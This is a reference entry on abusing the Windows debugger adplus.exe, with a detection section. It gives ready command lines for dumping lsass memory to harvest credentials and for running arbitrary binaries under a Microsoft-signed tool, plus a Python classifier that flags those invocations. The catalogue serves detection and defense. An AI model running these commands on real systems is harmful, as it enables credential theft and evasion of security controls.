adplus.exe

Debugging tool included with Windows Debugging Tools

Paths

  • C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
  • C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

Commands

Dump

Creates a memory dump of the lsass process

Use case: Create memory dump and parse it offline

Privileges: SYSTEM

adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet

Execute

Execute arbitrary commands using an adplus config file (see the Resources section for a sample file).

Use case: Run commands under a trusted Microsoft signed binary

Privileges: User

adplus.exe -c {PATH:.xml}

Dump

Dump process memory using an adplus config file (see the Resources section for a sample file).

Use case: Run commands under a trusted Microsoft signed binary

Privileges: SYSTEM

adplus.exe -c {PATH:.xml}

Execute

Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.

Use case: Run commands under a trusted Microsoft signed binary

Privileges: User

adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}

Detection
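
A command-line triage for the four invocations listed under Commands, as an added example (not part of the original page or of the adplus tooling): it tags process-creation command lines by the flags shown on this page. The sample events, the function names and the finding labels are constructed for illustration.

```python
import ntpath
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe" -hang -pn lsass.exe -o C:\Temp\out -quiet',
    r'adplus.exe -c C:\Temp\cfg.xml',
    r'adplus.exe -crash -o "C:\Temp\out dir" -sc C:\Temp\tool.exe',
    r'adplus.exe -hang -pn notepad.exe -o C:\Temp\out',  # ordinary debugging
    r'notepad.exe -c file.xml',                          # not adplus
]

def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify_adplus(cmdline):
    """Return the set of findings for one command line (empty if none)."""
    tokens = tokenize(cmdline)
    # Assumes the image path is quoted when it contains spaces.
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("adplus.exe", "adplus"):
        return set()
    flags = {}
    for i, tok in enumerate(tokens[1:], start=1):
        if tok.startswith("-"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            # A flag's value is the next token unless that is another flag.
            flags[tok.lower()] = "" if nxt.startswith("-") else nxt
    findings = set()
    if flags.get("-pn", "").lower() in ("lsass.exe", "lsass"):
        findings.add("lsass_dump")        # -pn lsass.exe: dump of lsass
    if "-c" in flags:
        findings.add("config_file")       # -c: behaviour defined by an XML file
    if "-sc" in flags:
        findings.add("spawned_command")   # -sc: adplus launches another binary
    return findings

def scan(events):
    """Return (command line, findings) pairs for events with any finding."""
    hits = [(e, classify_adplus(e)) for e in events]
    return [(e, f) for e, f in hits if f]

if __name__ == "__main__":
    for event, found in scan(SAMPLE_EVENTS):
        print(sorted(found), event)
```

The check keys on the image name and on the process-name form of the lsass dump shown on this page, so a renamed binary or a dump selected another way would not match. A `config_file` hit only says that the behaviour is defined in the referenced XML file, which then needs review.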

Resources